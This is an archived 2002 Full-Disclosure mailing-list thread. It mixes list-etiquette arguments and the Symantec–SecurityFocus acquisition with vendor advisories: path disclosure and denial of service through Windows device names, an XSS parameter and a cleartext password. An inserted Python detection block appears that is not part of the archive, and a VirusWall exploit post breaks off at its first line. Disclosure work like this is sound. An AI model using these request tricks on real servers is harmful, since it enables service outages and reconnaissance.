For what it's worth, I prefer it that way. With the exception of securityfocus' lists, all the mailing lists I'm on do it that way. It's what I'm used to, and, since the majority of replies go to the list not the individual who wrote the original post, it makes sense. 'Course, if you're the type that likes to flame everyone off-list without stopping to consider who you're writing to it might not be so convenient..... :p

The [Full-Disclosure] in the subject (that someone else objected to) I like as well, but I don't have such good reasons. I just like it.

- Blazde

From madduck at madduck.net Wed Jul 17 09:56:41 2002
From: madduck at madduck.net (martin f krafft)
Date: Wed, 17 Jul 2002 10:56:41 +0200
Subject: [Full-Disclosure] default list reply-to: address
In-Reply-To: <001501c22d33$7d2628b0$0a00a8c0@violetclub>
References: <20020716180433.G558@netsys.com> <3D34EF2C.50901@snosoft.com> <001501c22d33$7d2628b0$0a00a8c0@violetclub>
Message-ID: <20020717085641.GA18830@fishbowl.madduck.net>

also sprach Roland Postle [2002.07.17.0344 +0200]:
> For what it's worth, I prefer it that way. With the exception of
> securityfocus' lists, all the mailing lists I'm on do it that way. It's what
> I'm used to, and, since the majority of replies go to the list not the
> individual who wrote the original post, it makes sense.

Which is why proper mail clients handle this appropriately. In Mutt, I press 'r' to reply to the author, 'l' to reply to the list, and 'g' to reply to both. Obviously this breaks when Reply-To is set...

Anyway, I give you this to read: http://www.unicom.com/pw/reply-to-harmful.html

> The [Full-Disclosure] in the subject (that someone else objected to) I like
> as well, but I don't have such good reasons. I just like it.

It wastes bandwidth and doesn't add information that you couldn't add on the client-side. I am opposed.

-- 
martin; (greetings from the heart of the sun.)
\____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck

quantum mechanics: the dreams stuff is made of.

From pgrundl at kpmg.dk Wed Jul 17 10:27:32 2002
From: pgrundl at kpmg.dk (Peter Gründl)
Date: Wed, 17 Jul 2002 11:27:32 +0200
Subject: [Full-Disclosure] KPMG-2002031: Jigsaw Webserver Path Disclosure
Message-ID: <005401c22d74$2d736a30$2500a8c0@kpmguek0e8d7an>

--------------------------------------------------------------------
Title: Jigsaw Webserver Path Disclosure
BUG-ID: 2002031
Released: 17th Jul 2002
--------------------------------------------------------------------

Problem:
========
It is possible to disclose the physical path to the webroot. This information could be useful to a malicious user wishing to gain illegal access to resources on the server.

Vulnerable:
===========
- Jigsaw V2.2.1 Distribution on Windows 2000 Server

Not Vulnerable:
===============
- Jigsaw V2.2.1 Dev/2.2/20020711 on Windows 2000 Server

Product Description:
====================
Quoted from the vendor webpage:

"Jigsaw is W3C's leading-edge Web server platform, providing a sample HTTP 1.1 implementation and a variety of other features on top of an advanced architecture implemented in Java. The W3C Jigsaw Activity statement explains the motivation and future plans in more detail. Jigsaw is an W3C Open Source Project, started May 1996."

Details:
========
Requesting /aux two times results in an error message, after the second request, containing the physical path to the web root.

Vendor URL:
===========
You can visit the vendor webpage here: http://www.w3.org

Vendor response:
================
The vendor was notified on the 27th of May, 2002. On the 11th of July, 2002 we verified that the issue was corrected in the latest build (20020708).
Corrective action:
==================
Upgrade your Jigsaw.jar to the latest build, available from: http://jigsaw.w3.org/Devel/classes-2.2/20020711/

Author: Peter Gründl (pgrundl at kpmg.dk)

--------------------------------------------------------------------
KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information.
--------------------------------------------------------------------

From pgrundl at kpmg.dk Wed Jul 17 10:31:43 2002
From: pgrundl at kpmg.dk (Peter Gründl)
Date: Wed, 17 Jul 2002 11:31:43 +0200
Subject: [Full-Disclosure] KPMG-2002032: Macromedia Sitespring Cross Site Scripting
Message-ID: <00ab01c22d74$c32a9800$2500a8c0@kpmguek0e8d7an>

--------------------------------------------------------------------
Title: Macromedia Sitespring Cross Site Scripting
BUG-ID: 2002032
Released: 17th Jul 2002
--------------------------------------------------------------------

Problem:
========
A malicious user could use a default error page as the basis for a cross site scripting attack.

Vulnerable:
===========
- Macromedia Sitespring V1.2.0(277.1) on Windows 2000 Server

Details:
========
The default HTTP 500 error script does not check the contents of the error ticket (et) parameter before outputting it. That makes it possible to inject e.g. javascript in the URL.

http://server/error/500error.jsp?et=1

Vendor URL:
===========
You can visit the vendor webpage here: http://www.macromedia.com

Vendor response:
================
The vendor was notified on the 16th of April, 2002. The vendor has since removed the trial software from the webpage. To our knowledge there is no scheduled release date for a patch.

Additional notes:
=================
Quoted from the vendor's webpage:

"We will continue to provide technical support for Sitespring through May 2004. Please continue to visit the Sitespring support center for TechNotes, white papers, and other product information. If you've purchased a technical support plan for Sitespring, we will continue to provide support pursuant to the terms of your support agreement. Even though we will not be selling annual Sitespring support packages, you can purchase incident-based support from a technical support engineer."

Corrective action:
==================
Replace the error script with a custom error page. If you do not know how to create a .jsp file, simply create a standard 500 error page in html, and rename it to .jsp.

Author: Peter Gründl (pgrundl at kpmg.dk)

--------------------------------------------------------------------
KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information.
--------------------------------------------------------------------

From pgrundl at kpmg.dk Wed Jul 17 10:34:02 2002
From: pgrundl at kpmg.dk (Peter Gründl)
Date: Wed, 17 Jul 2002 11:34:02 +0200
Subject: [Full-Disclosure] KPMG-2002033: Resin DOS device path disclosure
Message-ID: <010301c22d75$1653cf10$2500a8c0@kpmguek0e8d7an>

--------------------------------------------------------------------
Title: Resin DOS device path disclosure
BUG-ID: 2002033
Released: 17th Jul 2002
--------------------------------------------------------------------

Problem:
========
It is possible to disclose the physical path to the webroot. This information could be useful to a malicious user wishing to gain illegal access to resources on the server.

Vulnerable:
===========
- Resin 2.1.1 on Windows 2000 Server
- Resin 2.1.2 on Windows 2000 Server

Not Vulnerable:
===============
- Resin 2.1.s020711 on Windows 2000 Server

Details:
========
Requesting certain DOS devices, such as lpt9.xtp, results in an error message that contains the physical path to the web root.

500 Servlet Exception
java.io.FileNotFoundException: C:\Documents and Settings\Administrator\Desktop\resin-2.1.1\resin-2.1.1\doc\aux.xtp (Access is denied)

Vendor URL:
===========
You can visit the vendor webpage here: http://www.caucho.com

Vendor response:
================
The vendor was notified on the 22nd of May, 2002. On the 12th of July we verified that the problem was corrected in the latest build (s020711).

Corrective action:
==================
Upgrade to a newer version. This issue was first resolved in build s020711, available here: http://www.caucho.com/download/index.xtp

Author: Peter Gründl (pgrundl at kpmg.dk)

--------------------------------------------------------------------
KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information.
--------------------------------------------------------------------

From pgrundl at kpmg.dk Wed Jul 17 10:36:45 2002
From: pgrundl at kpmg.dk (Peter Gründl)
Date: Wed, 17 Jul 2002 11:36:45 +0200
Subject: [Full-Disclosure] KPMG-2002034: Jigsaw Webserver DOS device DoS
Message-ID: <015f01c22d75$7729b200$2500a8c0@kpmguek0e8d7an>

--------------------------------------------------------------------
Title: Jigsaw Webserver DOS device DoS
BUG-ID: 2002034
Released: 17th Jul 2002
--------------------------------------------------------------------

Problem:
========
A malicious user can tie up working threads on the web server. When the web server runs out of working threads, the web server will no longer service web requests.

Vulnerable:
===========
- Jigsaw V2.2.1 Distribution on Windows 2000 Server

Not Vulnerable:
===============
- Jigsaw V2.2.1 Dev/2.2/20020711 on Windows 2000 Server

Product Description:
====================
Quoted from the vendor webpage:

"Jigsaw is W3C's leading-edge Web server platform, providing a sample HTTP 1.1 implementation and a variety of other features on top of an advanced architecture implemented in Java. The W3C Jigsaw Activity statement explains the motivation and future plans in more detail. Jigsaw is an W3C Open Source Project, started May 1996."

Details:
========
Requests for /servlet/con never time out, and approximately 30 of these requests are enough to tie up all working threads on the server. The service needs to be restarted to recover.

Vendor URL:
===========
You can visit the vendor webpage here: http://www.w3.org

Vendor response:
================
The vendor was notified on the 27th of May, 2002. On the 12th of July we verified that the problem was corrected in the latest build (s020711).

Corrective action:
==================
Upgrade to a newer version. This issue was first resolved in build s020711, available here: http://www.caucho.com/download/index.xtp

Author: Peter Gründl (pgrundl at kpmg.dk)

--------------------------------------------------------------------
KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information.
--------------------------------------------------------------------
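The three DOS-device advisories above (KPMG-2002031, -2002033 and -2002034) share one root cause: a path segment such as aux, lpt9.xtp or con is a reserved Windows device name, so the server opens a device instead of a file. The following is an added example, not code from the advisories or from Jigsaw or Resin: a check a container or reverse proxy can apply before dispatching a request, plus a scanner that flags such requests in constructed access-log lines. The log lines, client addresses and function names are assumptions made for this example.

```python
"""Reserved DOS device names in request paths (defensive check + log scan).

Added example, not part of the KPMG advisories or of Jigsaw/Resin. On
Windows a filename whose base is CON, PRN, AUX, NUL, COM1-9 or LPT1-9
resolves to the device regardless of extension; that is how /aux,
/lpt9.xtp and /servlet/con ended up opening a device instead of a file.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote, urlsplit

_RESERVED = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)


def reserved_device_segment(path: str) -> Optional[str]:
    """Return the first path segment naming a reserved device, else None.

    Percent-decode first so "/%61ux" is caught, drop the extension because
    Windows ignores it ("lpt9.xtp" -> LPT9), strip trailing spaces and dots
    because Windows ignores those too, and treat backslashes as separators.
    """
    decoded = unquote(path)
    for segment in decoded.replace("\\", "/").split("/"):
        base = segment.split(".", 1)[0].rstrip(" .").upper()
        if base in _RESERVED:
            return segment
    return None


def should_reject(request_target: str) -> bool:
    """Mitigation hook: True if the request must be refused before any
    servlet or file handler runs. The query string is ignored."""
    return reserved_device_segment(urlsplit(request_target).path) is not None


# Common Log Format line, as written by most HTTP servers' access logs.
_CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# (client host, request target, status code, offending path segment)
Hit = Tuple[str, str, int, str]


def scan_access_log(lines: List[str]) -> List[Hit]:
    """Detection: flag every logged request that names a reserved device.

    Caveat: a request that hangs a worker thread (the /servlet/con case)
    may never be logged at all, so should_reject() must run before
    dispatch rather than relying on the log alone.
    """
    hits: List[Hit] = []
    for line in lines:
        m = _CLF.match(line)
        if not m:
            continue
        seg = reserved_device_segment(urlsplit(m["target"]).path)
        if seg is not None:
            hits.append((m["host"], m["target"], int(m["status"]), seg))
    return hits


def hosts_over_threshold(hits: List[Hit], limit: int) -> List[str]:
    """Hosts with more than `limit` device-name requests; the advisory puts
    thread exhaustion at roughly 30 such requests, so alert well below that."""
    counts: dict = {}
    for host, _, _, _ in hits:
        counts[host] = counts.get(host, 0) + 1
    return sorted(h for h, n in counts.items() if n > limit)


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2002:11:00:01 +0200] "GET /index.html HTTP/1.1" 200 2326',
    '192.0.2.10 - - [17/Jul/2002:11:00:02 +0200] "GET /lpt9.xtp HTTP/1.1" 500 412',
    '192.0.2.10 - - [17/Jul/2002:11:00:03 +0200] "GET /servlet/con HTTP/1.1" 200 0',
    '192.0.2.10 - - [17/Jul/2002:11:00:04 +0200] "GET /%61ux HTTP/1.0" 500 388',
    '198.51.100.7 - - [17/Jul/2002:11:00:05 +0200] "GET /docs/console.html HTTP/1.1" 200 811',
    '198.51.100.7 - - [17/Jul/2002:11:00:06 +0200] "GET /nul.jsp?et=1 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for hit in found:
        print("device-name request:", hit)
    print("hosts over threshold:", hosts_over_threshold(found, 2))
```

Note that "console.html" is not flagged: only the whole base name before the first dot is compared, so ordinary files whose names merely start with a device name are left alone.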
From dotslash at snosoft.com Wed Jul 17 13:38:20 2002
From: dotslash at snosoft.com (KF)
Date: Wed, 17 Jul 2002 08:38:20 -0400
Subject: [Full-Disclosure] default list reply-to: address
References: <20020716180433.G558@netsys.com> <3D34EF2C.50901@snosoft.com> <001501c22d33$7d2628b0$0a00a8c0@violetclub>
Message-ID: <3D35653C.30803@snosoft.com>

*grin* I think you hit the nail right on the head. I think about the only mailing lists I use are the ones from securityfocus. I shall adapt I suppose. =]

-KF

Roland Postle wrote:
>
> For what it's worth, I prefer it that way. With the exception of
> securityfocus' lists, all the mailing lists I'm on do it that way. It's what
> I'm used to, and, since the majority of replies go to the list not the
> individual who wrote the original post, it makes sense.
>

From hellnbak at nmrc.org Wed Jul 17 15:03:30 2002
From: hellnbak at nmrc.org (hellNbak)
Date: Wed, 17 Jul 2002 10:03:30 -0400 (EDT)
Subject: [Full-Disclosure] default list reply-to: address
In-Reply-To: <20020717085641.GA18830@fishbowl.madduck.net>
Message-ID:

OMFG - 17 characters in the subject line wastes bandwidth? Get a grip. Your message is more of a waste of bandwidth than the extra characters in the subject line.......

As far as the reply-to goes, who cares? How hard is it to change the email address you are sending to? There are much bigger things to worry about than this stuff....

On Wed, 17 Jul 2002, martin f krafft wrote:
> Date: Wed, 17 Jul 2002 10:56:41 +0200
> From: martin f krafft
> Reply-To: full-disclosure at lists.netsys.com
> To: full-disclosure at lists.netsys.com
> Subject: Re: [Full-Disclosure] default list reply-to: address
>
> also sprach Roland Postle [2002.07.17.0344 +0200]:
> > For what it's worth, I prefer it that way. With the exception of
> > securityfocus' lists, all the mailing lists I'm on do it that way. It's what
> > I'm used to, and, since the majority of replies go to the list not the
> > individual who wrote the original post, it makes sense.
>
> Which is why proper mail clients handle this appropriately. In Mutt,
> I press 'r' to reply to the author, 'l' to reply to the list, and 'g'
> to reply to both. Obviously this breaks when Reply-To is set...
>
> Anyway, I give you this to read:
> http://www.unicom.com/pw/reply-to-harmful.html
>
> > The [Full-Disclosure] in the subject (that someone else objected to) I like
> > as well, but I don't have such good reasons. I just like it.
>
> It wastes bandwidth and doesn't add information that you couldn't add
> on the client-side. I am opposed.
>
> --

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"I don't intend to offend, I offend with my intent"
hellNbak at nmrc.org
http://www.nmrc.org/~hellnbak
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From lwc at vapid.ath.cx Wed Jul 17 15:25:33 2002
From: lwc at vapid.ath.cx (Larry W. Cashdollar)
Date: Wed, 17 Jul 2002 10:25:33 -0400 (EDT)
Subject: [Full-Disclosure] TheServer cleartext password sillyness.
In-Reply-To: <3D35653C.30803@snosoft.com>
Message-ID: <20020717102449.J44726-100000@vapid.ath.cx>

Vapid Labs Security Note

A quick note on Fastlink Software's TheServer http server. I was not going to write this up since it is a silly problem, but this server is listed in the netcraft survey so people are using it.

TheServer is a very small and simple webserver for the Windows platform; it consists of a single executable and configuration file.

Problem:

TheServer stores the password for log file access in cleartext. This password is stored in the server.ini file, which by default resides in the server's root directory. This is a VERY simple webserver for Windows 98/95; if the server is set up to log, then the password is also sent to the logfile when accessing the server logs remotely.

The risk is you can have someone else parsing your weblogs that you never intended.

Vendor: http://www.fastlinksoftware.com/
Netcraft Survey: http://www.netcraft.com/Survey/servers.html

Larry Cashdollar
Vapid Labs
http://vapid.ath.cx

From mail at blazde.co.uk Wed Jul 17 16:11:57 2002
From: mail at blazde.co.uk (Roland Postle)
Date: Wed, 17 Jul 2002 16:11:57 +0100
Subject: [Full-Disclosure] default list reply-to: address
References: <20020716180433.G558@netsys.com> <3D34EF2C.50901@snosoft.com> <001501c22d33$7d2628b0$0a00a8c0@violetclub>
Message-ID: <006101c22da4$4b810bb0$0a00a8c0@violetclub>

> > The [Full-Disclosure] in the subject (that someone else objected to) I like
> > as well, but I don't have such good reasons. I just like it.
>
> It wastes bandwidth

I think you must be drunk.

> Anyway, I give you this to read:
> http://www.unicom.com/pw/reply-to-harmful.html

There is a very good argument there, but still I can't help thinking of those HTML purists who rattle on about how blind people should be able to view your webpage if it's done properly. No matter how much they lecture us, the web won't change. And it won't be viewable properly by blind people until someone develops better tools for converting the visual content.

Email's been abused for far longer than HTML, and I can't help thinking there aren't many people who still rely on the Reply-To field to get their mail going to a different place than the From field. Perhaps that archaic functionality should move aside for the convenience of mailing lists.

Also, I really hate receiving three mails every time someone replies to one of my posts on these non Reply-To munging lists. Presumably they just hit the group reply button with no regard to the fact that my address ends up in there twice (I have no idea why twice) as well as the list address which I'm obviously subscribed to. Martin would have a fit at all that bandwidth wastage.

Incidentally, does anyone have a link that tells me whether my email client is handling these GnuPG messages correctly or not? I get 2 attachments, one a text file of the message and the other the signature. I have to open the attachment to read the messages, and then I have to copy-paste and manually add '>'s if I want to reply to bits of it. Abuse of the email format we've used successfully for decades or a lame mail client (OE)?

This is all horribly off-topic. Sorry.

- Blazde

From ulfh at Update.UU.SE Wed Jul 17 16:29:23 2002
From: ulfh at Update.UU.SE (Ulf Härnhammar)
Date: Wed, 17 Jul 2002 17:29:23 +0200
Subject: [Full-Disclosure] default list reply-to: address
In-Reply-To: <006101c22da4$4b810bb0$0a00a8c0@violetclub>
References: <20020716180433.G558@netsys.com> <3D34EF2C.50901@snosoft.com> <001501c22d33$7d2628b0$0a00a8c0@violetclub> <006101c22da4$4b810bb0$0a00a8c0@violetclub>
Message-ID: <20020717172923.A9254@Update.UU.SE>

On Wed, Jul 17, 2002 at 04:11:57PM +0100, Roland Postle wrote:
> There is a very good argument there, but still I can't help thinking of
> those HTML purists who rattle on about how blind people should be able to
> view your webpage if it's done properly. No matter how much they lecture us,
> the web won't change.

Hey, I wrote a tool to "remind" people to fix these things! It's called limegreen, it's available at http://savannah.gnu.org/projects/limegreen/ and it validates web sites with W3C's validator and complains via e-mail if the sites don't conform to the HTML specification.

// Ulf Harnhammar

From pauls at utdallas.edu Wed Jul 17 16:56:46 2002
From: pauls at utdallas.edu (Schmehl, Paul L)
Date: Wed, 17 Jul 2002 10:56:46 -0500
Subject: [Full-Disclosure] default list reply-to: address
Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EEAC9@UTDEVS02.campus.ad.utdallas.edu>

You won't like mine then. I used my own DOC SPEC in protest against the HTML purists who are far too snobby for my taste.
Paul Schmehl (pauls at utdallas.edu)
Supervisor of Support Services
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/

> -----Original Message-----
> From: Ulf Härnhammar [mailto:ulfh at Update.UU.SE]
> Sent: Wednesday, July 17, 2002 10:29 AM
> To: full-disclosure at lists.netsys.com
> Subject: Re: [Full-Disclosure] default list reply-to: address
>
> Hey, I wrote a tool to "remind" people to fix these things!
> It's called limegreen, it's available at
> http://savannah.gnu.org/projects/limegreen/
> and it validates web sites with W3C's validator and complains via e-mail if
> the sites don't conform to the HTML specification.

From lupe at lupe-christoph.de Wed Jul 17 19:53:02 2002
From: lupe at lupe-christoph.de (Lupe Christoph)
Date: Wed, 17 Jul 2002 20:53:02 +0200
Subject: [Full-Disclosure] default list reply-to: address
In-Reply-To: <871080DEC5874D41B4E3AFC5C400611E026EEAC9@UTDEVS02.campus.ad.utdallas.edu>
References: <871080DEC5874D41B4E3AFC5C400611E026EEAC9@UTDEVS02.campus.ad.utdallas.edu>
Message-ID: <20020717185302.GC1164@lupe-christoph.de>

On Wednesday, 2002-07-17 at 10:56:46 -0500, Schmehl, Paul L wrote:
> You won't like mine then. I used my own DOC SPEC in protest against the
> HTML purists who are far too snobby for my taste.

If I ever have a wheel to invent, would you do it for me? :-P

Lupe Christoph
-- 
| lupe at lupe-christoph.de | http://www.lupe-christoph.de/ |
| I have challenged the entire ISO-9000 quality assurance team to a |
| Bat-Leth contest on the holodeck. They will not concern us again. |
| http://public.logica.com/~stepneys/joke/klingon.htm |

From securityguru at hushmail.com Wed Jul 17 21:38:34 2002
From: securityguru at hushmail.com (securityguru at hushmail.com)
Date: Wed, 17 Jul 2002 13:38:34 -0700
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
Message-ID: <200207172038.g6HKcYg44082@mailserver2.hushmail.com>

FYI

Symantec to Acquire SecurityFocus

Offers Most Complete Security Early Warning System Available

CUPERTINO, Calif. - July 17, 2002 - Symantec Corp. (Nasdaq: SYMC) today announced the acquisition of SecurityFocus for approximately US$75 million in cash. With this acquisition, Symantec will offer customers the most comprehensive, proactive early warning system across the broadest range of threats. The transaction is expected to close by early to mid-August 2002.

"SecurityFocus has established the most respected security community and developed one of the leading early warning systems for customers around the world," said John W. Thompson, Symantec chairman and chief executive officer. "This acquisition will broaden Symantec's leadership in Internet security response with the addition of the world's first global threat management system, the most complete vulnerability database and customizable alert services."

"We have developed our global threat management systems to provide customers with timely and actionable information relevant to their individual networks," said Arthur Wong, SecurityFocus co-founder and chief executive officer. "Combined with Symantec's world-class antivirus expertise, industry-leading intrusion detection solutions and back-end infrastructure, we can rapidly deploy the most comprehensive threat management solutions to our global customers worldwide."

SecurityFocus has developed the world's most comprehensive and up-to-date database of vulnerabilities available. Symantec will continue to license the Vulnerability Database to security product vendors, managed service providers and other organizations that use it to create powerful new security products and services for their customers.

In addition, Symantec will continue to manage the Bugtraq mailing list and the online security community under the SecurityFocus brand. It will continue to offer a forum for objective reporting by security experts on the latest IT threats and attacks as well as how to prevent security breaches.

Symantec will also leverage the DeepSight line of global threat management solutions. The DeepSight Threat Management System provides early warning of attacks along with specific threat and patch information allowing companies to proactively protect their networks. More than 15,000 partners in more than 175 countries are registered to automatically provide a constant stream of security data that is correlated and analyzed to identify active attacks.

DeepSight Analyzer gives IT professionals the ability to track and manage incidents on their own networks by automatically correlating attacks from a multitude of intrusion detection solutions. The product manages threats by comparing incidents on their network against the Vulnerability Database, tracking attacks to resolution and generating statistical incident reports. Using information about suspicious network traffic and intrusions submitted by anonymous users, SecurityFocus identifies patterns in attacks that help serve as a threat-gauging system for the Internet community.

By monitoring almost 11,000 distinct versions of more than 2,700 products from 1,300 vendors, SecurityFocus provides proactive, customized alert services for environment-specific vulnerabilities and malicious code alerts. DeepSight Alert Services can be configured to ensure that customers receive only alerts that are relevant to their networks, enabling them to deploy patches or work-arounds before vulnerabilities can be exploited.
Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople From core at bokeoa.com Wed Jul 17 22:07:08 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Wed, 17 Jul 2002 15:07:08 -0600 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... References: <200207172038.g6HKcYg44082@mailserver2.hushmail.com> Message-ID: <3D35DC7C.4050401@bokeoa.com> Isn't it great how the community is so nice in supporting the exploitation and misuse of proprietary exploit source code to further the large companies for-profit endeavours? peace, core securityguru at hushmail.com wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > FYI > > Symantec to Acquire SecurityFocus > > Offers Most Complete Security Early Warning System Available > > CUPERTINO, Calif. - July 17, 2002 - Symantec Corp. (Nasdaq: SYMC) today announced the acquisition of SecurityFocus for approximately US$75 million in cash. With this acquisition, Symantec will offer customers the most comprehensive, proactive early warning system across the broadest range of threats. The transaction is expected to close by early to mid-August 2002. > > "SecurityFocus has established the most respected security community and developed one of the leading early warning systems for customers around the world," said John W. Thompson, Symantec chairman and chief executive officer. "This acquisition will broaden Symantec's leadership in Internet security response with the addition of the world's first global threat management system, the most complete vulnerability database and customizable alert services." > > "We have developed our global threat management systems to provide customers with timely and actionable information relevant to their individual networks," said Arthur Wong, SecurityFocus co-founder and chief executive officer. 
"Combined with Symantec's world-class antivirus expertise, industry-leading intrusion detection solutions and back-end infrastructure, we can rapidly deploy the most comprehensive threat management solutions to our global customers worldwide." > > SecurityFocus has developed the world's most comprehensive and up-to-date database of vulnerabilities available. Symantec will continue to license the Vulnerability Database to security product vendors, managed service providers and other organizations that use it to create powerful new security products and services for their customers. > > In addition, Symantec will continue to manage the Bugtraq mailing list and the online security community under the SecurityFocus brand. It will continue to offer a forum for objective reporting by security experts on the latest IT threats and attacks as well as how to prevent security breaches. > > Symantec will also leverage the DeepSight line of global threat management solutions. The DeepSight Threat Management System provides early warning of attacks along with specific threat and patch information allowing companies to proactively protect their networks. More than 15,000 partners in more than 175 countries are registered to automatically provide a constant stream of security data that is correlated and analyzed to identify active attacks. > > DeepSight Analyzer gives IT professionals the ability to track and manage incidents on their own networks by automatically correlating attacks from a multitude of intrusion detection solutions. The product manages threats by comparing incidents on their network against the Vulnerability Database, tracking attacks to resolution and generating statistical incident reports. Using information about suspicious network traffic and intrusions submitted by anonymous users, SecurityFocus identifies patterns in attacks that help serve as a threat-gauging system for the Internet community. 
>
> By monitoring almost 11,000 distinct versions of more than 2,700 products from 1,300 vendors, SecurityFocus provides proactive, customized alert services for environment-specific vulnerabilities and malicious code alerts. DeepSight Alert Services can be configured to ensure that customers receive only alerts that are relevant to their networks, enabling them to deploy patches or work-arounds before vulnerabilities can be exploited.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure at lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure

From steve at entrenchtech.com Wed Jul 17 22:01:51 2002
From: steve at entrenchtech.com (Steve)
Date: Wed, 17 Jul 2002 15:01:51 -0600
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others....
References: <200207172038.g6HKcYg44082@mailserver2.hushmail.com> <3D35DC7C.4050401@bokeoa.com>
Message-ID: <00fd01c22dd5$2c2436d0$f954b8a1@entrenchtech.com>

I hate to say this guys but with all due respect: I told you so!

Steve Manzuik
Moderator - VulnWatch
www.vulnwatch.org

----- Original Message -----
From: "Charles 'core' Stevenson"
To:
Sent: Wednesday, July 17, 2002 3:07 PM
Subject: Re: [Full-Disclosure] Symantec Buys SecurityFocus, among others....

> Isn't it great how the community is so nice in supporting the
> exploitation and misuse of proprietary exploit source code to further
> the large companies for-profit endeavours?
>
> peace,
> core
>
> securityguru at hushmail.com wrote:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > FYI
> >
> > Symantec to Acquire SecurityFocus
> > [snip]
From securityguru at hushmail.com Wed Jul 17 23:08:37 2002
From: securityguru at hushmail.com (securityguru at hushmail.com)
Date: Wed, 17 Jul 2002 15:08:37 -0700
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.. ..
Message-ID: <200207172208.g6HM8b358256@mailserver2.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

WTF????

First SecurityFocus makes cash off of things they get for FREE, then all those guys get rich by selling out to Symantec. Symantec, of course, claims they will maintain the same integrity as SecurityFocus did. If that's the case, we've got problems...where's my $$$$?

>>>-----Original Message-----
>>>From: Charles 'core' Stevenson [mailto:core at bokeoa.com]
>>>Sent: Wednesday, July 17, 2002 5:07 PM
>>>To: full-disclosure at lists.netsys.com
>>>Subject: Re: [Full-Disclosure] Symantec Buys SecurityFocus, among
>>>others....
>>>
>>>
>>>Isn't it great how the community is so nice in supporting the
>>>exploitation and misuse of proprietary exploit source code to further
>>>the large companies for-profit endeavours?
>>>
>>>peace,
>>>core

From mfrd at attitudex.com Wed Jul 17 23:32:38 2002
From: mfrd at attitudex.com (Muhammad Faisal Rauf Danka)
Date: Wed, 17 Jul 2002 15:32:38 -0700 (PDT)
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others..
Message-ID: <20020717223238.A37D136F9@sitemail.everyone.net>

An embedded and charset-unspecified text was scrubbed...
Name: not available
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020717/a1a036b0/attachment.ksh

From len at netsys.com Thu Jul 18 00:31:03 2002
From: len at netsys.com (Len Rose)
Date: Wed, 17 Jul 2002 19:31:03 -0400
Subject: [Full-Disclosure] update on solaris 9 playpen
Message-ID: <20020717193103.M14259@netsys.com>

I've gotten a few notes from folks, and we're going to go ahead with the project. I'm building the server; it will take a while to get it completed and delivered to a colocation facility.

More news when the above has been completed.

Len

From dotslash at snosoft.com Thu Jul 18 06:07:19 2002
From: dotslash at snosoft.com (KF)
Date: Wed, 17 Jul 2002 22:07:19 -0700
Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.. ..
References: <200207172208.g6HM8b358256@mailserver2.hushmail.com>
Message-ID: <3D364D07.2090909@snosoft.com>

don't try to ask any vendors for cash ... some of them try to bite.
-KF

securityguru at hushmail.com wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>WTF????
>First SecurityFocus makes cash off of things they get for FREE, then all those guys get rich by selling out to Symantec. Symantec, of course, claims they will maintain the same integrity as SecurityFocus did. If that's the case, we've got problems...where's my $$$$?
>
>

From noamr at beyondsecurity.com Thu Jul 18 12:41:22 2002
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Thu, 18 Jul 2002 13:41:22 +0200
Subject: [Full-Disclosure] TrendMicro's VirusWall Space Gap (Exploit)
Message-ID: <08ff01c22e50$0b5dc030$2200a8c0@noambs>

This advisory can be viewed online, and will be updated regularly at:
http://www.securiteam.com/exploits/5DP0A2A7QC.html

-----

Title: TrendMicro's VirusWall Space Gap (Exploit)

Summary
As we reported in our previous article, TrendMicro's VirusWall Space Gap (Virus Protection Bypassing), a security vulnerability in TrendMicro's VirusWall allows remote attackers to bypass its defense and insert a malicious virus through the VirusWall. The following is an exploit code that can be used to test for this vulnerability.

Details:
Vulnerable systems:
 * TrendMicro's VirusWall version 3.52 build 1375 (or any other build prior to 1462)

Immune systems:
 * TrendMicro's VirusWall version 3.52 build 1462
 * TrendMicro's VirusWall version 5.1 (Allows stopping of malformed emails, not enabled by default)

CVE: CAN-2002-0637

Exploit:

#!/usr/bin/perl
